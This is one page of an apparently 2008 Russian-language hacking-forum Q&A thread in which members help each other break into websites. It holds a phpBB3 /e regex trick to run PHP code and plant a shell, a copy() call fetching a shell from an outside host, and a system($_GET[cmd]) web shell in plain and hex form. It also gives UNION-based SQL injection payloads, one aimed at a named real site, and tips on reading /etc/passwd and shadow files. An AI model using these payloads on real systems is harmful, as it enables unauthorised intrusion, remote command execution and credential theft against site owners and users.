Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
Page 190 of 1207
  1. none222

    none222 Guest

    Reputations:
    0
    нихрена там нет. Ищи на багтреках про жумлу
     
    #3781 none222, 25 Nov 2008
  2. Ghost0ff

    Ghost0ff New Member

    Joined:
    18 Nov 2008
    Messages:
    28
    Likes Received:
    4
    Reputations:
    0
    Вопрос такой... phpbb3 форум.. я задал тут вопрос как мне через админку залить шелл? ответили что через восстановление базы и в коде :UPDATE forum_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig=phpinfo() WHERE user_id=2;
    Сработало однако )) Но вот незадача... я хз че дальше то делать. Что можно выполнить используя данный код. что то прописать в нем вместо phpinfo()? подскажите...
     
    #3782 Ghost0ff, 25 Nov 2008
  3. none222

    none222 Guest

    Reputations:
    0
    видимо, любую пхп комманду =)
     
    #3783 none222, 25 Nov 2008
  4. Ershik

    Ershik Elder - Старейшина

    Joined:
    7 Nov 2007
    Messages:
    301
    Likes Received:
    46
    Reputations:
    6
    Здесь проблема в кодировке, или в отстутсвии оператора UNION?
     
    #3784 Ershik, 25 Nov 2008
  5. ThreeD

    ThreeD Banned

    Joined:
    25 Dec 2006
    Messages:
    128
    Likes Received:
    112
    Reputations:
    9
    В кодировке. Пробуй convert(concat(version())+using+latin1)
     
    #3785 ThreeD, 25 Nov 2008
  6. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    union+select+1,unhex(hex(version())),3/*
     
    #3786 Pashkela, 25 Nov 2008
  7. ThreeD

    ThreeD Banned

    Joined:
    25 Dec 2006
    Messages:
    128
    Likes Received:
    112
    Reputations:
    9
    convert(version(),binary)
    AES_DECRYPT(AES_ENCRYPT(CONCAT(version()),0x71),0x71)
    ...
    Давай все поперечисляем?
     
    #3787 ThreeD, 25 Nov 2008
  8. Ershik

    Ershik Elder - Старейшина

    Joined:
    7 Nov 2007
    Messages:
    301
    Likes Received:
    46
    Reputations:
    6
    Действительно, в кодировке.
    Спасибо :)
     
    #3788 Ershik, 25 Nov 2008
  9. Ghost0ff

    Ghost0ff New Member

    Joined:
    18 Nov 2008
    Messages:
    28
    Likes Received:
    4
    Reputations:
    0
    хм... вот такая вот ошибочка когда пытаюсь залить код с copy:
    SQL Error : 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'http://shall57.narod.ru/shall.txt','/usr/local/www/vhosts/xxx/httpdocs/f' at line 1

    UPDATE forum_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='forum:copy('http://shall57.narod.ru/shall.txt','/usr/local/www/vhosts/xxx.ru/httpdocs/forum/avatars/shall.txt')' WHERE user_id=2

    Line : 980
    File : admin_db_utilities.php


    Подумал можт дело в '' убрал их... залилось но выдает пустую страничку (((((
     
    #3789 Ghost0ff, 25 Nov 2008
  10. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    Ghost0ff
    в пхпбб какой версии пытаешся залить шелл? кинь данные в пм зделаю)
     
    #3790 sabe, 25 Nov 2008
  11. krypt3r

    krypt3r Elder - Старейшина

    Joined:
    27 Apr 2007
    Messages:
    1,507
    Likes Received:
    389
    Reputations:
    101
    Ясен пень, что дело в кавычках. Внутренние апострофы экранировать надо.
     
    #3791 krypt3r, 25 Nov 2008
  12. Ghost0ff

    Ghost0ff New Member

    Joined:
    18 Nov 2008
    Messages:
    28
    Likes Received:
    4
    Reputations:
    0
    хм... это как? оО кинь ссылко на источник или объясни плз
     
    #3792 Ghost0ff, 25 Nov 2008
  13. DimOnOID

    DimOnOID Banned

    Joined:
    5 Dec 2006
    Messages:
    407
    Likes Received:
    126
    Reputations:
    4
    а что system(wget get и т.д) уже не в моде? или отключён? Лишний гемор всё это...
     
    #3793 DimOnOID, 25 Nov 2008
    1 person likes this.
  14. ThreeD

    ThreeD Banned

    Joined:
    25 Dec 2006
    Messages:
    128
    Likes Received:
    112
    Reputations:
    9
    +1
    Всё равно спросят )
    '<?system($_GET[cmd]);?>'
    Или так, если кавычки не катят.
    0x3c3f2073797374656d2824636d64293b203f3e
    Потом обращаешься к нему
    shell.php?cmd=ls -la
    wget'oм заливаешь шелл со своего хоста.
     
    #3794 ThreeD, 25 Nov 2008
    Last edited: 25 Nov 2008
    1 person likes this.
  15. WisP™

    WisP™ New Member

    Joined:
    25 Nov 2008
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Подскажите как бороться с такой ошибкой?

    error in query 'select *, count(news_id) as news_count, news_id, category.category_id from category left join news using(category_id) where category.category_id = 38 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/* group by category.category_id' Mixing of GROUP columns (MIN(),MAX(),COUNT(),...) with no GROUP columns is illegal if there is no GROUP BY clause

    столбцов 24,судя по order by!
    Ссылку выложить к сожалению не могу
     
    #3795 WisP™, 25 Nov 2008
    Last edited: 25 Nov 2008
  16. [Raz0r]

    [Raz0r] Elder - Старейшина

    Joined:
    25 Feb 2007
    Messages:
    425
    Likes Received:
    484
    Reputations:
    295
    @WisP™
    там же LEFT JOIN, нужно так:
    -1 GROUP BY category.category_id UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/*
     
    #3796 [Raz0r], 25 Nov 2008
    1 person likes this.
  17. d1aVOL

    d1aVOL Elder - Старейшина

    Joined:
    29 Jul 2007
    Messages:
    37
    Likes Received:
    6
    Reputations:
    0
    опять я запутался..

    Code:
    urbanwild@localhost - user
5.0.17-nt-log - version

    Code:
    CHARACTER_SETS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
KEY_COLUMN_USAGE
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
VIEWS
USER_PRIVILEGES
menu
wysiwyg
tbl_news
tbl_pages
tbl_wysiwyg
    не могу посмотреть содержимое столбцов
    http://www.heimlichinstitute.org/page.php?id=-1+union+select+1,unhex(hex(COLUMN_NAME)),3,4+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='USER_PRIVILEGES'+LIMIT+1,1--
     
    #3797 d1aVOL, 25 Nov 2008
  18. Calcutta

    Calcutta Elder - Старейшина

    Joined:
    6 Aug 2007
    Messages:
    343
    Likes Received:
    243
    Reputations:
    36
    хекси название таблиц без кавычек.
    http://snak3.h17.ru/tools

    к примеру USER_PRIVILEGES будет выглядеть как:
    Code:
    16bit:0x555345525f50524956494c45474553
     
    #3798 Calcutta, 25 Nov 2008
    Last edited: 25 Nov 2008
  19. Octave_Parango

    Octave_Parango Member

    Joined:
    6 Nov 2008
    Messages:
    83
    Likes Received:
    11
    Reputations:
    -1
    Приветствую Всех.

    Вытащил все из /etc/passwd/ вот такого вида:

    Как я понимаю, тут одни логины, пассы должны лежать в etc/shadow, там пусто, так как доступно только для пользователя с рутовами правами...

    Подскажите, как дальше действовать?
     
    #3799 Octave_Parango, 25 Nov 2008
    Last edited: 25 Nov 2008
    1 person likes this.
  20. Calcutta

    Calcutta Elder - Старейшина

    Joined:
    6 Aug 2007
    Messages:
    343
    Likes Received:
    243
    Reputations:
    36
    хэши паролей заменены на 'x', так что содержание файла бесполезное.

    посмотри так же:
    Code:
    /etc/shadow.old
/etc/​passwd.tmp
/etc/master.passwd
    но сомневаюсь, что ситуация изменится (-
     
    #3800 Calcutta, 25 Nov 2008
    Last edited: 25 Nov 2008
(You must log in or sign up to post here.)
Page 190 of 1207
Thread Status:
Not open for further replies.
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.